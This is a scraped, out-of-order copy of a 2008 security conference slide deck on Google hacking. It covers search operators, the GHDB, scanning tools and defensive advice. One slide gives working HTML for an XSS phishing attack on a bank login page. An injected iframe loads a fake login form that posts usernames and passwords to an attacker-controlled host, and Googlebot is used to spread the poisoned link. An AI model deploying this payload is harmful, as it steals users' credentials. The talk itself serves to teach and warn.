Google Hacking
Database (GHDB)                        We find the link:
--------------------------------
                                       http://www.CITEC.com/bank/Login.asp?MsgError=Access
Google Hacking
basics                                 denied
Google Advanced                        Create the file 1.html the code is:
Operators
--------------------------------          <html>
Locating Exploits and                     <title>CITEC Bank | Login CITEC | CITEC Account</
Finding Targets
                                           title>
Tracking Down Web
Servers, Login                             <a href=“http://www.CITEC.com/bank/Login.asp?
Portals, etc..
                                           MsgError=<iframe src=‘http://www.social.com/
Dirty Attacks
using Googlebot
                                           2.html’></iframe>”>CITEC Bank</a>
Google Hacking Tools                       </html>
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Dirty Attacks using Googlebot!

                                   Cross	
  Site	
  Framing	
  via	
  Googlebot	
  
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
                                         And the file 2.html
Google Hacking                               <form method=“post” action=“http://
Database (GHDB)
                                             www.social.com/1.php>
--------------------------------
Google Hacking                               Username: <input type=“text” name=“user”><br>
basics
                                             Password: <input type=“password” name=“pass”>
Google Advanced
Operators                                    <input type=“submit” value=“Send”>
--------------------------------
                                              </form>
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login                           Then upload All The Files to:
Portals, etc..
                                                http://www.social.com/
Dirty Attacks
using Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Dirty Attacks using Googlebot!

                                   Cross	
  Site	
  Framing	
  via	
  Googlebot	
  
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?                     After a few days GoogleBot will index the file:
Google Hacking
Database (GHDB)
                                                http://www.social.com/1.html
--------------------------------
Google Hacking
basics
                                         Then will index the link “CITEC Bank”(that
Google Advanced                            within the file):
Operators
                                             http://www.CITEC.com/bank/Login.asp?
--------------------------------
Locating Exploits and
                                             MsgError=<iframe src=‘http://www.social.com/2.html’></
Finding Targets                              iframe>
Tracking Down Web
Servers, Login
Portals, etc..

Dirty Attacks
using Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Dirty Attacks using Googlebot!

                                   Cross	
  Site	
  Framing	
  via	
  Googlebot	
  
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?                   The users that search “CITEC Bank” will find
Google Hacking                         the above link and when getting   inside the link
Database (GHDB)
--------------------------------
                                       they will see this form:
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..

Dirty Attacks
using Googlebot
Google Hacking Tools
                                       The Result: Many Users are being Manipulated by the
--------------------------------
                                       attacker which uses Google in order to execute a Phishing
                                       attack (with XSS).
Dirty Attacks
           With
  Google hacking
                                   Google Hacking Tools!

What is Google                     Google	
  Hacking	
  Database	
  (GHDB)!
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot

Google Hacking
Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Hacking Tools!

What is Google                     Gooscan!
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot

Google Hacking
Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Hacking Tools!

What is Google                     SiteDigger	
  Tools!
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot

Google Hacking
Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Hacking Tools!

                                   Goolink	
  –	
  This	
  is	
  very	
  handy	
  for	
  finding	
  vulnerable	
  site	
  wide	
  open	
  to	
  
What is Google
Hacking?
                                                                           google	
  and	
  googlebots!
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot

Google Hacking
Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Hacking Tools!

What is Google                     GoolagScanner	
  –	
  Enable	
  to	
  Audit	
  Website	
  via	
  Google!
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot

Google Hacking
Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Spike Bot – (By Me )!

What is Google
Hacking?
                                          Google	
  Links	
  with	
  Spike	
  Bot !
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot

Google Hacking
Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   How to Protect Google Hacking!

What is Google                       Keep sensitive data off the web
Hacking?
                                     Use common sense!! Basic security practices is all it
What a Hacker Can do
with vulnerable Web?                  takes. Defense in depth, act diligently when
Google Hacking
                                      configuring web based devices and have a strong
Database (GHDB)                       corporate security policy
--------------------------------     Use Google hacking techniques to uncover your own
Google Hacking
basics
                                      security problems. So…..Google hack yourself!
Google Advanced                      Perform periodic Google Assessments
Operators
                                       –  Update robots.txt
--------------------------------
Locating Exploits and
                                       –  Use meta-tags: NOARCHIVE
Finding Targets                        –  http://www.google.com/remove.html
Tracking Down Web
Servers, Login
                                     Work with Google for help in removing security
Portals, etc..                        breaches. They are easy to work with and want to
Dirty Attacks using                   help! You can find contact info on their site
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   If someone is still in the room.. Q & A!

What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking



                                           THANK YOU
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------

Weitere ähnliche Inhalte

Was ist angesagt?

Introduction to google hacking database
Introduction to google hacking databaseIntroduction to google hacking database
Introduction to google hacking databaseimthebeginner
 
The page and the desktop
The page and the desktopThe page and the desktop
The page and the desktopGlenn Jones
 
Demystifying google hacks
Demystifying google hacksDemystifying google hacks
Demystifying google hacksdarwinah retno
 
Xcode Survival Guide
Xcode Survival GuideXcode Survival Guide
Xcode Survival GuideKristina Fox
 
The internet for SEOs by Roxana Stingu
The internet for SEOs by Roxana StinguThe internet for SEOs by Roxana Stingu
The internet for SEOs by Roxana StinguRoxana Stingu
 
OSINT tools for security auditing with python
OSINT tools for security auditing with pythonOSINT tools for security auditing with python
OSINT tools for security auditing with pythonJose Manuel Ortega Candel
 
Log files: The Overlooked Source of SEO Opportunities
Log files: The Overlooked Source of SEO OpportunitiesLog files: The Overlooked Source of SEO Opportunities
Log files: The Overlooked Source of SEO OpportunitiesRobin Rozhon
 
GraphQL, l'avenir du REST par François ZANINOTTO
GraphQL, l'avenir du REST par François ZANINOTTOGraphQL, l'avenir du REST par François ZANINOTTO
GraphQL, l'avenir du REST par François ZANINOTTOLa Cuisine du Web
 
Building Twitter's SDKs for Android
Building Twitter's SDKs for AndroidBuilding Twitter's SDKs for Android
Building Twitter's SDKs for AndroidAndy Piper
 
.htaccess for SEOs - A presentation by Roxana Stingu
.htaccess for SEOs - A presentation by Roxana Stingu.htaccess for SEOs - A presentation by Roxana Stingu
.htaccess for SEOs - A presentation by Roxana StinguRoxana Stingu
 
Making sense of users' Web activities
Making sense of users' Web activitiesMaking sense of users' Web activities
Making sense of users' Web activitiesMathieu d'Aquin
 
London seo master - feb 2020
London seo master - feb 2020London seo master - feb 2020
London seo master - feb 2020Matt Williamson
 
How to optimise TTFB - BrightonSEO 2020
How to optimise TTFB - BrightonSEO 2020How to optimise TTFB - BrightonSEO 2020
How to optimise TTFB - BrightonSEO 2020Roxana Stingu
 
InterCon 2016 - HTTP/2 for Web Application Developers
InterCon 2016 - HTTP/2 for Web Application DevelopersInterCon 2016 - HTTP/2 for Web Application Developers
InterCon 2016 - HTTP/2 for Web Application DevelopersiMasters
 
brighton final.pptx
brighton final.pptxbrighton final.pptx
brighton final.pptxssuser152aeb
 
Pulp Google Hacking
Pulp Google HackingPulp Google Hacking
Pulp Google HackingBishop Fox
 

Was ist angesagt? (20)

Google Hacking 101
Google Hacking 101Google Hacking 101
Google Hacking 101
 
Introduction to google hacking database
Introduction to google hacking databaseIntroduction to google hacking database
Introduction to google hacking database
 
The page and the desktop
The page and the desktopThe page and the desktop
The page and the desktop
 
Demystifying google hacks
Demystifying google hacksDemystifying google hacks
Demystifying google hacks
 
Xcode Survival Guide
Xcode Survival GuideXcode Survival Guide
Xcode Survival Guide
 
The internet for SEOs by Roxana Stingu
The internet for SEOs by Roxana StinguThe internet for SEOs by Roxana Stingu
The internet for SEOs by Roxana Stingu
 
OSINT tools for security auditing with python
OSINT tools for security auditing with pythonOSINT tools for security auditing with python
OSINT tools for security auditing with python
 
Log files: The Overlooked Source of SEO Opportunities
Log files: The Overlooked Source of SEO OpportunitiesLog files: The Overlooked Source of SEO Opportunities
Log files: The Overlooked Source of SEO Opportunities
 
GraphQL, l'avenir du REST par François ZANINOTTO
GraphQL, l'avenir du REST par François ZANINOTTOGraphQL, l'avenir du REST par François ZANINOTTO
GraphQL, l'avenir du REST par François ZANINOTTO
 
Building Twitter's SDKs for Android
Building Twitter's SDKs for AndroidBuilding Twitter's SDKs for Android
Building Twitter's SDKs for Android
 
.htaccess for SEOs - A presentation by Roxana Stingu
.htaccess for SEOs - A presentation by Roxana Stingu.htaccess for SEOs - A presentation by Roxana Stingu
.htaccess for SEOs - A presentation by Roxana Stingu
 
Making sense of users' Web activities
Making sense of users' Web activitiesMaking sense of users' Web activities
Making sense of users' Web activities
 
Archivo Word
Archivo WordArchivo Word
Archivo Word
 
London seo master - feb 2020
London seo master - feb 2020London seo master - feb 2020
London seo master - feb 2020
 
Maven Plugins
Maven PluginsMaven Plugins
Maven Plugins
 
How to optimise TTFB - BrightonSEO 2020
How to optimise TTFB - BrightonSEO 2020How to optimise TTFB - BrightonSEO 2020
How to optimise TTFB - BrightonSEO 2020
 
3 google hacking
3 google hacking3 google hacking
3 google hacking
 
InterCon 2016 - HTTP/2 for Web Application Developers
InterCon 2016 - HTTP/2 for Web Application DevelopersInterCon 2016 - HTTP/2 for Web Application Developers
InterCon 2016 - HTTP/2 for Web Application Developers
 
brighton final.pptx
brighton final.pptxbrighton final.pptx
brighton final.pptx
 
Pulp Google Hacking
Pulp Google HackingPulp Google Hacking
Pulp Google Hacking
 

Andere mochten auch

Afceh 2.0 Final
Afceh 2.0 FinalAfceh 2.0 Final
Afceh 2.0 Finalmaheshojha
 
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...Rob Ragan
 
Podcasting intro for Rhodes
Podcasting intro for RhodesPodcasting intro for Rhodes
Podcasting intro for RhodesBryan Alexander
 
Web tools to foster creativity
Web tools to foster creativityWeb tools to foster creativity
Web tools to foster creativityPaula Ledesma
 
The Rest of the Story: Assessing and Specifying Environmental Product Declara...
The Rest of the Story: Assessing and Specifying Environmental Product Declara...The Rest of the Story: Assessing and Specifying Environmental Product Declara...
The Rest of the Story: Assessing and Specifying Environmental Product Declara...novacsi
 
The Web, The User and the Library (and why to get in between)
The Web, The User and the Library (and why to get in between)The Web, The User and the Library (and why to get in between)
The Web, The User and the Library (and why to get in between)Guus van den Brekel
 
TYPES OF HACKING
TYPES OF HACKINGTYPES OF HACKING
TYPES OF HACKINGSHERALI445
 
Web scripting in MadCap Flare
Web scripting in MadCap FlareWeb scripting in MadCap Flare
Web scripting in MadCap Flaredocguy
 
Php Lenguaje de Paginas Web
Php Lenguaje de Paginas Web Php Lenguaje de Paginas Web
Php Lenguaje de Paginas Web Jimmy Arturo
 
Phishing As Tragedy of the Commons
Phishing As Tragedy of the CommonsPhishing As Tragedy of the Commons
Phishing As Tragedy of the Commonsamiable_indian
 
Circular Economy - And Open Source + Hacking As Paths To It
Circular Economy - And Open Source + Hacking As Paths To It Circular Economy - And Open Source + Hacking As Paths To It
Circular Economy - And Open Source + Hacking As Paths To It Lars Zimmermann
 
El Information Security Forum
El Information Security ForumEl Information Security Forum
El Information Security ForumConferencias FIST
 
2015년 3분기 주요 정보보안 소식 차민석 20160117_공개판
2015년 3분기 주요 정보보안 소식 차민석 20160117_공개판2015년 3분기 주요 정보보안 소식 차민석 20160117_공개판
2015년 3분기 주요 정보보안 소식 차민석 20160117_공개판Minseok(Jacky) Cha
 

Andere mochten auch (20)

Google hacking 2015
Google hacking 2015Google hacking 2015
Google hacking 2015
 
Hacking
HackingHacking
Hacking
 
Afceh 2.0 Final
Afceh 2.0 FinalAfceh 2.0 Final
Afceh 2.0 Final
 
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
 
Research
ResearchResearch
Research
 
Podcasting intro for Rhodes
Podcasting intro for RhodesPodcasting intro for Rhodes
Podcasting intro for Rhodes
 
Php Tutorials for Beginners
Php Tutorials for BeginnersPhp Tutorials for Beginners
Php Tutorials for Beginners
 
Web tools to foster creativity
Web tools to foster creativityWeb tools to foster creativity
Web tools to foster creativity
 
The Rest of the Story: Assessing and Specifying Environmental Product Declara...
The Rest of the Story: Assessing and Specifying Environmental Product Declara...The Rest of the Story: Assessing and Specifying Environmental Product Declara...
The Rest of the Story: Assessing and Specifying Environmental Product Declara...
 
Mobius lab Review
Mobius lab ReviewMobius lab Review
Mobius lab Review
 
The Web, The User and the Library (and why to get in between)
The Web, The User and the Library (and why to get in between)The Web, The User and the Library (and why to get in between)
The Web, The User and the Library (and why to get in between)
 
Phishing-Updated
Phishing-UpdatedPhishing-Updated
Phishing-Updated
 
TYPES OF HACKING
TYPES OF HACKINGTYPES OF HACKING
TYPES OF HACKING
 
Web scripting in MadCap Flare
Web scripting in MadCap FlareWeb scripting in MadCap Flare
Web scripting in MadCap Flare
 
Google as a Hacking Tool
Google as a Hacking ToolGoogle as a Hacking Tool
Google as a Hacking Tool
 
Php Lenguaje de Paginas Web
Php Lenguaje de Paginas Web Php Lenguaje de Paginas Web
Php Lenguaje de Paginas Web
 
Phishing As Tragedy of the Commons
Phishing As Tragedy of the CommonsPhishing As Tragedy of the Commons
Phishing As Tragedy of the Commons
 
Circular Economy - And Open Source + Hacking As Paths To It
Circular Economy - And Open Source + Hacking As Paths To It Circular Economy - And Open Source + Hacking As Paths To It
Circular Economy - And Open Source + Hacking As Paths To It
 
El Information Security Forum
El Information Security ForumEl Information Security Forum
El Information Security Forum
 
2015년 3분기 주요 정보보안 소식 차민석 20160117_공개판
2015년 3분기 주요 정보보안 소식 차민석 20160117_공개판2015년 3분기 주요 정보보안 소식 차민석 20160117_공개판
2015년 3분기 주요 정보보안 소식 차민석 20160117_공개판
 

Ähnlich wie CITEC #CON2-Dirty Attack with Google Hacking

Hack attack pulp google
Hack attack pulp googleHack attack pulp google
Hack attack pulp googlesourav6388
 
Jamie Alberico — How to Leverage Insights from Your Site’s Server Logs | 5 Ho...
Jamie Alberico — How to Leverage Insights from Your Site’s Server Logs | 5 Ho...Jamie Alberico — How to Leverage Insights from Your Site’s Server Logs | 5 Ho...
Jamie Alberico — How to Leverage Insights from Your Site’s Server Logs | 5 Ho...Semrush
 
Ethical_Hacking_ppt
Ethical_Hacking_pptEthical_Hacking_ppt
Ethical_Hacking_pptNarayanan
 
SearchLove Boston 2017 | Dom Woodman | How to Get Insight From Your Logs
SearchLove Boston 2017 | Dom Woodman | How to Get Insight From Your LogsSearchLove Boston 2017 | Dom Woodman | How to Get Insight From Your Logs
SearchLove Boston 2017 | Dom Woodman | How to Get Insight From Your LogsDistilled
 
2007 2-google hacking-report
2007 2-google hacking-report2007 2-google hacking-report
2007 2-google hacking-reportsunil kumar
 
2007 2-google hacking-report
2007 2-google hacking-report2007 2-google hacking-report
2007 2-google hacking-reportsunil kumar
 
A Guide to Log Analysis with Big Query
A Guide to Log Analysis with Big QueryA Guide to Log Analysis with Big Query
A Guide to Log Analysis with Big QueryDominic Woodman
 
SearchLove London 2016 | Dom Woodman | How to Get Insight From Your Logs
SearchLove London 2016 | Dom Woodman | How to Get Insight From Your LogsSearchLove London 2016 | Dom Woodman | How to Get Insight From Your Logs
SearchLove London 2016 | Dom Woodman | How to Get Insight From Your LogsDistilled
 
Advanced googling
Advanced googlingAdvanced googling
Advanced googlingsonuagain
 
Web Security - Introduction
Web Security - IntroductionWeb Security - Introduction
Web Security - IntroductionSQALab
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Oles Seheda
 
Google Hacking by Ali Jahangiri
Google Hacking by Ali JahangiriGoogle Hacking by Ali Jahangiri
Google Hacking by Ali JahangiriDevetol
 
GNUCITIZEN Pdp Owasp Day September 2007
GNUCITIZEN Pdp Owasp Day   September 2007GNUCITIZEN Pdp Owasp Day   September 2007
GNUCITIZEN Pdp Owasp Day September 2007guest20ab09
 
Internet hacked google search
Internet hacked   google searchInternet hacked   google search
Internet hacked google searchGordon Kraft
 
Website ethical hacking and testing
Website ethical hacking and testingWebsite ethical hacking and testing
Website ethical hacking and testingKaranJindal18
 
Kiran karnad rtc2014 ghdb-final
Kiran karnad rtc2014 ghdb-finalKiran karnad rtc2014 ghdb-final
Kiran karnad rtc2014 ghdb-finalRomania Testing
 
Taming botnets
Taming botnetsTaming botnets
Taming botnetsf00d
 
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisLife Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisPositive Hack Days
 

Ähnlich wie CITEC #CON2-Dirty Attack with Google Hacking (20)

Hack attack pulp google
Hack attack pulp googleHack attack pulp google
Hack attack pulp google
 
Jamie Alberico — How to Leverage Insights from Your Site’s Server Logs | 5 Ho...
Jamie Alberico — How to Leverage Insights from Your Site’s Server Logs | 5 Ho...Jamie Alberico — How to Leverage Insights from Your Site’s Server Logs | 5 Ho...
Jamie Alberico — How to Leverage Insights from Your Site’s Server Logs | 5 Ho...
 
Ethical_Hacking_ppt
Ethical_Hacking_pptEthical_Hacking_ppt
Ethical_Hacking_ppt
 
SearchLove Boston 2017 | Dom Woodman | How to Get Insight From Your Logs
SearchLove Boston 2017 | Dom Woodman | How to Get Insight From Your LogsSearchLove Boston 2017 | Dom Woodman | How to Get Insight From Your Logs
SearchLove Boston 2017 | Dom Woodman | How to Get Insight From Your Logs
 
2007 2-google hacking-report
2007 2-google hacking-report2007 2-google hacking-report
2007 2-google hacking-report
 
2007 2-google hacking-report
2007 2-google hacking-report2007 2-google hacking-report
2007 2-google hacking-report
 
A Guide to Log Analysis with Big Query
A Guide to Log Analysis with Big QueryA Guide to Log Analysis with Big Query
A Guide to Log Analysis with Big Query
 
SearchLove London 2016 | Dom Woodman | How to Get Insight From Your Logs
SearchLove London 2016 | Dom Woodman | How to Get Insight From Your LogsSearchLove London 2016 | Dom Woodman | How to Get Insight From Your Logs
SearchLove London 2016 | Dom Woodman | How to Get Insight From Your Logs
 
Google Hacking
Google HackingGoogle Hacking
Google Hacking
 
Advanced googling
Advanced googlingAdvanced googling
Advanced googling
 
Web Security - Introduction
Web Security - IntroductionWeb Security - Introduction
Web Security - Introduction
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3
 
Google Hacking by Ali Jahangiri
Google Hacking by Ali JahangiriGoogle Hacking by Ali Jahangiri
Google Hacking by Ali Jahangiri
 
GNUCITIZEN Pdp Owasp Day September 2007
GNUCITIZEN Pdp Owasp Day   September 2007GNUCITIZEN Pdp Owasp Day   September 2007
GNUCITIZEN Pdp Owasp Day September 2007
 
Internet hacked google search
Internet hacked   google searchInternet hacked   google search
Internet hacked google search
 
Website ethical hacking and testing
Website ethical hacking and testingWebsite ethical hacking and testing
Website ethical hacking and testing
 
Kiran karnad rtc2014 ghdb-final
Kiran karnad rtc2014 ghdb-finalKiran karnad rtc2014 ghdb-final
Kiran karnad rtc2014 ghdb-final
 
Taming botnets
Taming botnetsTaming botnets
Taming botnets
 
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisLife Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
 
Pppeople 2020
Pppeople 2020Pppeople 2020
Pppeople 2020
 

Mehr von Prathan Phongthiproek

The CARzyPire - Another Red Team Operation
The CARzyPire - Another Red Team OperationThe CARzyPire - Another Red Team Operation
The CARzyPire - Another Red Team OperationPrathan Phongthiproek
 
Cyber Kill Chain: Web Application Exploitation
Cyber Kill Chain: Web Application ExploitationCyber Kill Chain: Web Application Exploitation
Cyber Kill Chain: Web Application ExploitationPrathan Phongthiproek
 
OWASP Day - OWASP Day - Lets secure!
OWASP Day - OWASP Day - Lets secure! OWASP Day - OWASP Day - Lets secure!
OWASP Day - OWASP Day - Lets secure! Prathan Phongthiproek
 
Don't Trust, And Verify - Mobile Application Attacks
Don't Trust, And Verify - Mobile Application AttacksDon't Trust, And Verify - Mobile Application Attacks
Don't Trust, And Verify - Mobile Application AttacksPrathan Phongthiproek
 
Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20Prathan Phongthiproek
 
OWASP Thailand-Beyond the Penetration Testing
OWASP Thailand-Beyond the Penetration TestingOWASP Thailand-Beyond the Penetration Testing
OWASP Thailand-Beyond the Penetration TestingPrathan Phongthiproek
 
Mobile Application Pentest [Fast-Track]
Mobile Application Pentest [Fast-Track]Mobile Application Pentest [Fast-Track]
Mobile Application Pentest [Fast-Track]Prathan Phongthiproek
 
CDIC 2013-Mobile Application Pentest Workshop
CDIC 2013-Mobile Application Pentest WorkshopCDIC 2013-Mobile Application Pentest Workshop
CDIC 2013-Mobile Application Pentest WorkshopPrathan Phongthiproek
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedPrathan Phongthiproek
 
Layer8 exploitation: Lock'n Load Target
Layer8 exploitation: Lock'n Load TargetLayer8 exploitation: Lock'n Load Target
Layer8 exploitation: Lock'n Load TargetPrathan Phongthiproek
 

Mehr von Prathan Phongthiproek (20)

Mobile Defense-in-Dev (Depth)
Mobile Defense-in-Dev (Depth)Mobile Defense-in-Dev (Depth)
Mobile Defense-in-Dev (Depth)
 
The CARzyPire - Another Red Team Operation
The CARzyPire - Another Red Team OperationThe CARzyPire - Another Red Team Operation
The CARzyPire - Another Red Team Operation
 
Cyber Kill Chain: Web Application Exploitation
Cyber Kill Chain: Web Application ExploitationCyber Kill Chain: Web Application Exploitation
Cyber Kill Chain: Web Application Exploitation
 
Mobile App Hacking In A Nutshell
Mobile App Hacking In A NutshellMobile App Hacking In A Nutshell
Mobile App Hacking In A Nutshell
 
Jump-Start The MASVS
Jump-Start The MASVSJump-Start The MASVS
Jump-Start The MASVS
 
OWASP Mobile Top 10 Deep-Dive
OWASP Mobile Top 10 Deep-DiveOWASP Mobile Top 10 Deep-Dive
OWASP Mobile Top 10 Deep-Dive
 
The Hookshot: Runtime Exploitation
The Hookshot: Runtime ExploitationThe Hookshot: Runtime Exploitation
The Hookshot: Runtime Exploitation
 
Understanding ransomware
Understanding ransomwareUnderstanding ransomware
Understanding ransomware
 
OWASP Day - OWASP Day - Lets secure!
OWASP Day - OWASP Day - Lets secure! OWASP Day - OWASP Day - Lets secure!
OWASP Day - OWASP Day - Lets secure!
 
Don't Trust, And Verify - Mobile Application Attacks
Don't Trust, And Verify - Mobile Application AttacksDon't Trust, And Verify - Mobile Application Attacks
Don't Trust, And Verify - Mobile Application Attacks
 
Owasp Top 10 Mobile Risks
Owasp Top 10 Mobile RisksOwasp Top 10 Mobile Risks
Owasp Top 10 Mobile Risks
 
Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20
 
OWASP Thailand-Beyond the Penetration Testing
OWASP Thailand-Beyond the Penetration TestingOWASP Thailand-Beyond the Penetration Testing
OWASP Thailand-Beyond the Penetration Testing
 
Mobile Application Pentest [Fast-Track]
Mobile Application Pentest [Fast-Track]Mobile Application Pentest [Fast-Track]
Mobile Application Pentest [Fast-Track]
 
Hack and Slash: Secure Coding
Hack and Slash: Secure CodingHack and Slash: Secure Coding
Hack and Slash: Secure Coding
 
CDIC 2013-Mobile Application Pentest Workshop
CDIC 2013-Mobile Application Pentest WorkshopCDIC 2013-Mobile Application Pentest Workshop
CDIC 2013-Mobile Application Pentest Workshop
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
 
Layer8 exploitation: Lock'n Load Target
Layer8 exploitation: Lock'n Load TargetLayer8 exploitation: Lock'n Load Target
Layer8 exploitation: Lock'n Load Target
 
Advanced Malware Analysis
Advanced Malware AnalysisAdvanced Malware Analysis
Advanced Malware Analysis
 
Tisa mobile forensic
Tisa mobile forensicTisa mobile forensic
Tisa mobile forensic
 

CITEC #CON2-Dirty Attack with Google Hacking

  • 1. Dirty Attacks with Google Hacking Prathan Phongthiproek ACIS Professional Center Information Security Consultant – Penetration Tester November 16th, 2008
  • 2. Dirty Attacks With Google hacking What I’ve done ?!   Penetration Testing (BlackBox and WhiteBox) What is Google Hacking? What a Hacker Can do   Security Consultant ( I Hate this job !!) with vulnerable Web? Google Hacking   Active Security Researcher Database (GHDB) -------------------------------- Google Hacking   Devoted Hacker basics Google Advanced   Exploits and Vulnerabilities Disclosure Operators -------------------------------- (CWH Underground) Locating Exploits and Finding Targets   Tools: g00mail Enumerator, SQLFuzzer, 4ppCrawl3r, Spike Tracking Down Web Bot (Developing) Etc.. Servers, Login Portals, etc.. Dirty Attacks using   Comments, Feedback ? >> prathan.ptr@gmail.com ! Googlebot (Don’t spam mail !! lol)! Google Hacking Tools -------------------------------- #w 03:19:18 up 1 min, 1 user, load average: 1.73, 0.71, 0.26 USER TTY FROM LOGIN@ IDLE JCPU PCPU prathan phongthiproek tty1 - 03:18 0.00s 0.08s 0.01s
  • 3. Dirty Attacks With Google hacking What is Google Hacking ?!   It is NOT hacking into Google!! What is Google (Hacking Google: Sidejacking, XSS Spreadsheet, etc) Hacking?   Google is much more than just a simple search What a Hacker Can do with vulnerable Web? interface and engine. Google Hacking   Google hacking is the use of a search engine to locate a security vulnerability on the Database (GHDB) Internet --------------------------------   Google crawls public websites for information using Google Hacking basics an automated search and record program called Google Advanced “Googlebot”. Operators   IRC Bot using Google Hacking to find Vulnerability -------------------------------- and Exploits Locating Exploits and Finding Targets   Refers to using the Google search engine in an effort to pull sensitive information, such Tracking Down Web as credit card numbers, out of a poorly constructed Web application ! Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 4. Dirty Attacks With Google hacking What is Google Hacking ?!   Johnny Long is the “grandfather” of Google hacking. What is Google   His website http://johnny.ihackstuff.com is exclusively Hacking? dedicated to Google Hacking and you will find all sorts What a Hacker Can do with vulnerable Web? of cool information there. Google Hacking   Johnny Long Database (GHDB) •  Wrote Google Hacking for Penetration Testers; ISBN -------------------------------- 1597491764 Google Hacking basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------
  • 5. What a Hacker Can do with Dirty Attacks With Google hacking Vulnerable Web ?! When an attacker knows the sort of vulnerability he ! What is Google Hacking? wants to exploit but has no specific target,  The  Best  Solu-on  is  “Dirty  Google   What a Hacker Search  operators” Can do with vulnerable Web?   File Inclusion (RFI, LFI) Google Hacking Database (GHDB)   SQL Injection --------------------------------   Remote Code Execution Google Hacking basics   Arbitrary Add Admin Google Advanced   Arbitrary File Upload Operators   XSS / XSRF -------------------------------- Locating Exploits and   Directory Listing Finding Targets   Directory Traversal Tracking Down Web Servers, Login   Source code disclosure Portals, etc..   Administrative Login Portals Dirty Attacks using Googlebot   Web server Information Google Hacking Tools   Reveal Pathnames and Filenames --------------------------------   Social Engineering (Damn !! How do you get my address)
